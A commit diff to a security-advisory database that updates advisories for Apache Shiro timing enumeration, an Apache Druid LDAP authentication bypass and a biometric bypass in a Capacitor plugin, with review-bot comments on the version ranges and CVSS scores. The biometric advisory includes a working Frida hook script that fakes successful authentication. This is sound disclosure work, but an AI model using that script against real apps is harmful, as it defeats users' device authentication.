
Commit 0b10419

1 parent db41845 commit 0b10419

4 files changed

Lines changed: 190 additions & 11 deletions


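--- a/advisories/unreviewed/2026/02/GHSA-c4qc-4q9p-m9q9/GHSA-c4qc-4q9p-m9q9.json
+++ b/advisories/github-reviewed/2026/02/GHSA-c4qc-4q9p-m9q9/GHSA-c4qc-4q9p-m9q9.json
@@ -1,24 +1,49 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-c4qc-4q9p-m9q9",
-"modified": "2026-02-10T12:30:28Z",
+"modified": "2026-02-10T14:33:33Z",
 "published": "2026-02-10T12:30:28Z",
 "aliases": [
 "CVE-2026-23901"
 ],
+"summary": "Apache Shiro Affected by an Observable Timing Discrepancy Vulnerability",
 "details": "Observable Timing Discrepancy vulnerability in Apache Shiro.\n\nThis issue affects Apache Shiro: from 1.*, 2.* before 2.0.7.\n\nUsers are recommended to upgrade to version 2.0.7 or later, which fixes the issue.\n\nPrior to Shiro 2.0.7, code paths for non-existent vs. existing users are different enough,\nthat a brute-force attack may be able to tell, by timing the requests only, determine if\nthe request failed because of a non-existent user vs. wrong password.\n\nThe most likely attack vector is a local attack only.\nShiro security model  https://shiro.apache.org/security-model.html#username_enumeration  discusses this as well.\n\nTypically, brute force attack can be mitigated at the infrastructure level.",
 "severity": [
 {
 "type": "CVSS_V4",
-"score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:A/V:C/RE:L/U:Green"
+"score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N"
+}
+],
+"affected": [
+{
+"package": {
+"ecosystem": "Maven",
+"name": "org.apache.shiro:shiro-core"
+},
+"ranges": [
+{
+"type": "ECOSYSTEM",
+"events": [
+{
+"introduced": "0"
+},
+{
+"fixed": "2.1.0"
+}
+]
+}
+]
 }
 ],
-"affected": [],
 "references": [
 {
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23901"
 },
+{
+"type": "PACKAGE",
+"url": "https://github.com/apache/shiro"
+},
 {
 "type": "WEB",
 "url": "https://lists.apache.org/thread/mm1jct9b86jvnh3y44tj22xvjtx3xhhh"
@@ -33,8 +58,8 @@
 "CWE-208"
 ],
 "severity": "LOW",
-"github_reviewed": false,
-"github_reviewed_at": null,
+"github_reviewed": true,
+"github_reviewed_at": "2026-02-10T14:33:33Z",
 "nvd_published_at": "2026-02-10T10:15:59Z"
 }
 }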
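Review bot: The new affected range ends at `"fixed": "2.1.0"`, but the details text in the same file says the issue affects "2.* before 2.0.7" and tells users to upgrade to 2.0.7 or later, so a scanner consuming this advisory will flag a 2.0.7–2.0.x installation as vulnerable while the prose says it is patched. Either the range should read `"fixed": "2.0.7"` or the details should state that 2.1.0 is the first fixed release actually published to Maven Central, whichever matches the released artifacts; the two must not disagree. Trimming the vector to base metrics is fine, but AV:L/PR:L/UI:A sits oddly beside a description that talks about timing "the requests" on an authentication path: a CWE-208 discrepancy on a network-reachable login endpoint is observable by a remote, unauthenticated client, so the AV and PR choices (and the "local attack only" wording they rest on) deserve a second look before this is relied on for prioritisation.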

advisories/unreviewed/2026/02/GHSA-q672-hfc7-g833/GHSA-q672-hfc7-g833.json renamed to advisories/github-reviewed/2026/02/GHSA-q672-hfc7-g833/GHSA-q672-hfc7-g833.json

Lines changed: 36 additions & 6 deletions
@@ -1,19 +1,49 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-q672-hfc7-g833",
4-
"modified": "2026-02-10T12:30:28Z",
4+
"modified": "2026-02-10T14:33:40Z",
55
"published": "2026-02-10T12:30:28Z",
66
"aliases": [
77
"CVE-2026-23906"
88
],
9+
"summary": "Apache Druid Vulnerable to Authentication Bypass",
910
"details": "Affected Products and Versions\n * Apache Druid\n * Affected Versions: 0.17.0 through 35.x (all versions prior to 36.0.0)\n * Prerequisites: * druid-basic-security extension enabled\n * LDAP authenticator configured\n * Underlying LDAP server permits anonymous bind                                                                                                                                                   \n\n\n\n\n\n\nVulnerability Description\n\nAn authentication bypass vulnerability exists in Apache Druid when using the druid-basic-security extension with LDAP authentication. If the underlying LDAP server is configured to allow anonymous\nbinds, an attacker can bypass authentication by providing an existing username with an empty password. This allows unauthorized access to otherwise restricted Druid resources without valid credentials.\n\nThe vulnerability stems from improper validation of LDAP authentication responses when anonymous binds are permitted, effectively treating anonymous bind success as valid user authentication. \n\nImpact\n\nA remote, unauthenticated attacker can:\n * Gain unauthorized access to the Apache Druid cluster\n * Access sensitive data stored in Druid datasources\n * Execute queries and potentially manipulate data\n * Access administrative interfaces if the bypassed account has elevated privileges\n * Completely compromise the confidentiality, integrity, and availability of the Druid deployment                                                                                                                                                                                    \n\n\nMitigation\n \nImmediate Mitigation (No Druid Upgrade Required):                                                                                                                                                   \n * Disable anonymous bind on your LDAP server. 
This prevents the vulnerability from being exploitable and is the recommended immediate action.\n\n\n\nResolution\n * Upgrade Apache Druid to version 36.0.0 or later, which includes fixes to properly reject anonymous LDAP bind attempts.",
10-
"severity": [],
11-
"affected": [],
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Maven",
21+
"name": "org.apache.druid.extensions:druid-basic-security"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0.17.0"
29+
},
30+
{
31+
"fixed": "36.0.0"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
1238
"references": [
1339
{
1440
"type": "ADVISORY",
1541
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23906"
1642
},
43+
{
44+
"type": "WEB",
45+
"url": "https://github.com/apache/druid"
46+
},
1747
{
1848
"type": "WEB",
1949
"url": "https://lists.apache.org/thread/2x9rv3kv6t1p577lvq4z0rl0zlt9g4sr"
@@ -23,9 +53,9 @@
2353
"cwe_ids": [
2454
"CWE-287"
2555
],
26-
"severity": null,
27-
"github_reviewed": false,
28-
"github_reviewed_at": null,
56+
"severity": "CRITICAL",
57+
"github_reviewed": true,
58+
"github_reviewed_at": "2026-02-10T14:33:40Z",
2959
"nvd_published_at": "2026-02-10T10:15:59Z"
3060
}
3161
}
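Review bot: The new repository reference `"url": "https://github.com/apache/druid"` is typed `"WEB"`, whereas the Shiro advisory in this same commit types the equivalent repository link `"PACKAGE"`; use `"type": "PACKAGE"` here so tooling that resolves the package repository from the PACKAGE reference treats both advisories the same way. On the substance, the only pre-upgrade mitigation offered is "disable anonymous bind on your LDAP server", but the described trigger (an existing username with an empty password) is the simple-bind "unauthenticated authentication" case of RFC 4513 §5.1.2, which some directory servers control separately from anonymous bind; a practitioner should verify that a DN-plus-empty-password bind is actually rejected by their server rather than assume the anonymous-bind toggle covers it, and the advisory would be stronger if it said so. Note also that the base vector carries AT:N even though exploitation depends on a non-default LDAP server configuration; whether that condition belongs in Attack Requirements is a judgment call, but the rationale for AT:N should be recorded somewhere reviewers can find it.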
Lines changed: 59 additions & 0 deletions
@@ -0,0 +1,59 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-vx5f-vmr6-32wf",
4+
"modified": "2026-02-10T14:33:50Z",
5+
"published": "2026-02-10T14:33:50Z",
6+
"aliases": [],
7+
"summary": "cap-go/capacitor-native-biometric Authentication Bypass",
8+
"details": "There is a potential issue with the [cap-go/capacitor-native-biometric](https://github.com/Cap-go/capacitor-native-biometric) library. \n\n---\n\n## Summary\n\nThe [cap-go/capacitor-native-biometric](https://github.com/Cap-go/capacitor-native-biometric) library was found to be subject to an authentication bypass as the current implementation of the `onAuthenticationSucceeded()` does not appear to handle a `CryptoObject`[^HackTricks1] [^SecuringBiometricAuthentication] as seen in the following code block starting from [line 88 in AuthActivity.java](https://github.com/Cap-go/capacitor-native-biometric/blob/main/android/src/main/java/ee/forgr/biometric/AuthActivity.java#L88):\n\n```java\n@Override\n public void onAuthenticationSucceeded(\n @NonNull BiometricPrompt.AuthenticationResult result\n ) {\n super.onAuthenticationSucceeded(result);\n finishActivity(\"success\");\n }\n```\n\nAs the current implementation only checks whether `onAuthenticationSucceeded()` was called and does not handle a `CryptoObject` the biometric authentication can be bypassed by hooking the `onAuthenticationSucceeded()` function. \n\n## PoC Video:\n\nhttps://github.com/user-attachments/assets/b7b5a2bc-21dc-4373-b371-84b002dae7a7\n\n## Environment:\n\nThe following steps were taken to create and deploy a Capacitor application using the `cap-go/capacitor-native-biometric library` for the purpose of verifying this finding. Note at the time of writing the `npx create-react-app` command broke, so I have provided two ways of creating and deploying the testing environment. Apparently React updated to version 19 caused a dependency issue as seen [here](https://github.com/facebook/create-react-app/issues/13715). If it is not fixed by the time you look at this PoC please use the yarn alternatives. \n\n1. Create a new Capacitor app by opening your terminal and run the following commands to create a new Capacitor app. 
For the sake of the disclosure I'll be using the name `capgo-poc`: \n\n```sh\nnpx create-react-app capgo-poc --template typescript\n```\n\nYarn Alternative:\n\n```sh\nnpm install --global yarn\nyarn create react-app capgo-poc --template typescript\n```\n\n2. Install dependencies by navigating into your app's directory and run the following command to install Capacitor's core dependencies:\n\n```sh\ncd capgo-poc\nnpm install @capacitor/core \nnpm install @capacitor/cli \nnpm install @capacitor/android\nnpm install @capgo/capacitor-native-biometric\nnpm install react\n```\n\nYarn Alternative:\n\n```sh\ncd capgo-poc\nyarn add @capacitor/core \nyarn add @capacitor/cli \nyarn add @capacitor/android\nyarn add @capgo/capacitor-native-biometric\nyarn add react\n```\n\n3. Initialise the project using the name `capgo-poc` and `com.capgo.poc`, and add the android platform by running the following commands:\n\n```sh\nnpx cap init\nnpx cap add android\n```\n\n4. Configure the android permissions by opening the `android/app/src/main/AndroidManifest.xml` file and add the necessary permissions:\n\n```xml\n<uses-permission android:name=\"android.permission.USE_BIOMETRIC\" />\n<uses-permission android:name=\"android.permission.USE_FINGERPRINT\" />\n```\n\n5. Implement Biometric Authentication, here is some basic code to use the biometric authentication feature. 
Modify the TSX file called `App.tsx` in `src/` and import the following code:\n\n```js\nimport React, { useState } from 'react';\nimport { NativeBiometric } from '@capgo/capacitor-native-biometric';\n\nconst App = () => {\n // State to hold authentication status\n const [authStatus, setAuthStatus] = useState<string | null>(null);\n\n // Function to authenticate the user\n const authenticateUser = async () => {\n try {\n const result = await NativeBiometric.verifyIdentity({\n reason: 'For an application access',\n title: 'Log in',\n subtitle: '',\n description: 'Verify yourself by biometrics',\n useFallback: true,\n maxAttempts: 3,\n }).then(() => true)\n .catch(() => false);\n\n if (!result) {\n setAuthStatus('failed');\n } else {\n setAuthStatus('success');\n }\n } catch (error) {\n console.error('Error during biometric verification:', error);\n setAuthStatus('error');\n }\n };\n\n return (\n <div>\n <h1>CAP-GO Capacitor Native Biometric Authentication</h1>\n <button onClick={authenticateUser}>Authenticate with Biometrics</button>\n\n {/* Conditionally render based on authentication status */}\n {authStatus === 'success' && <h2>CAP-GO Capacitor Native Biometric Authentication Success</h2>}\n {authStatus === 'failed' && <h2>CAP-GO Capacitor Native Biometric Authentication Failed</h2>}\n {authStatus === 'error' && <h2>Error during authentication</h2>}\n </div>\n );\n};\n\nexport default App;\n```\n\n6. Build the React project, synchronise it with the Android platform, and open the native Android project in Android Studio by running the following commands:\n\n```sh\nnpm run build\nnpx cap sync android \nnpx cap open android\n```\n\nYarn alternative:\n\n```sh\nyarn build\nnpx cap sync android \nnpx cap open android\n```\n\n## Exploitation:\n\nFor the purpose of demonstrating the vulnerability we will be using frida and a rooted emulator from android studio. Frida is a dynamic instrumentation toolkit used as part of pentesting mobile applications [^frida]. 
\n\nNote that a rooted emulator is not necessary, but is being used for simplicity to demonstrate the vulnerability. \n\n1. Copy the below frida script to a JavaScript file and run it to hook the `onAuthenticationSucceeded()` function, abusing the `null CryptoObject`. This can be done by running the following command:\n\n```sh\nfrida -U -l <PAYLOAD> -n 'capgo-poc'\n```\n\n### Payload\n```js\nJava.perform(function () {\n hookBiometricPrompt();\n});\n\nfunction getBiometricAuthResult(resultObj, cryptoInst) {\n var authenticationResultInst = resultObj.$new(cryptoInst, 0);\n return authenticationResultInst;\n};\n\nfunction getBiometricPromptResult() {\n var cryptoObj = Java.use('android.hardware.biometrics.BiometricPrompt$CryptoObject');\n var cryptoInst = cryptoObj.$new(null);\n var authenticationResultObj = Java.use('android.hardware.biometrics.BiometricPrompt$AuthenticationResult');\n var authenticationResultInst = getBiometricAuthResult(authenticationResultObj, cryptoInst);\n return authenticationResultInst\n};\n\nfunction hookBiometricPrompt() {\n var biometricPrompt = Java.use('android.hardware.biometrics.BiometricPrompt')['authenticate'].overload('android.os.CancellationSignal', 'java.util.concurrent.Executor', 'android.hardware.biometrics.BiometricPrompt$AuthenticationCallback');\n console.log(\"Hooking BiometricPrompt.authenticate()...\");\n biometricPrompt.implementation = function (cancellationSignal, executor, callback) {\n var authenticationResultInst = getBiometricPromptResult();\n callback.onAuthenticationSucceeded(authenticationResultInst);\n }\n};\n```\n\n[^SecuringBiometricAuthentication]: https://www.kayssel.com/post/android-8/\n[^HackTricks1]: https://book.hacktricks.xyz/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android#method-1-bypassing-with-no-crypto-object-usage\n[^frida]: https://frida.re/",
9+
"severity": [
10+
{
11+
"type": "CVSS_V4",
12+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "npm",
19+
"name": "@capgo/capacitor-native-biometric"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "0"
27+
},
28+
{
29+
"fixed": "8.3.6"
30+
}
31+
]
32+
}
33+
]
34+
}
35+
],
36+
"references": [
37+
{
38+
"type": "WEB",
39+
"url": "https://github.com/Cap-go/capgo/security/advisories/GHSA-vx5f-vmr6-32wf"
40+
},
41+
{
42+
"type": "WEB",
43+
"url": "https://github.com/Cap-go/capacitor-native-biometric/commit/1254602e942f8216e6258f646f0866d8e69c48a5"
44+
},
45+
{
46+
"type": "PACKAGE",
47+
"url": "https://github.com/Cap-go/capgo"
48+
}
49+
],
50+
"database_specific": {
51+
"cwe_ids": [
52+
"CWE-287"
53+
],
54+
"severity": "MODERATE",
55+
"github_reviewed": true,
56+
"github_reviewed_at": "2026-02-10T14:33:50Z",
57+
"nvd_published_at": null
58+
}
59+
}
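Review bot: The `PACKAGE` reference points at `https://github.com/Cap-go/capgo`, but the affected package is `@capgo/capacitor-native-biometric`, whose source (per the details and the fix-commit reference two entries up) lives at `https://github.com/Cap-go/capacitor-native-biometric`; the PACKAGE entry should be that repository, with the capgo link kept as a plain `WEB` reference since the GHSA was filed there. The vector `AV:N/AC:L/AT:N/PR:N/UI:N` is hard to reconcile with the exploitation path the details describe, which hooks `onAuthenticationSucceeded()` with Frida inside the app process on a rooted emulator, i.e. local access to the device with elevated privileges; something closer to AV:L/PR:H matches the stated prerequisites, and whichever is kept, the reasoning should be recorded. Finally, the details explain the root cause (no `CryptoObject` is consumed in `onAuthenticationSucceeded()`) but say nothing about what 8.3.6 changes; a sentence confirming that the fix performs a keystore-backed operation on `result.getCryptoObject()` with a user-authentication-bound key and fails closed on a null `CryptoObject` would let readers judge whether the hook-based bypass is closed or merely relocated.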
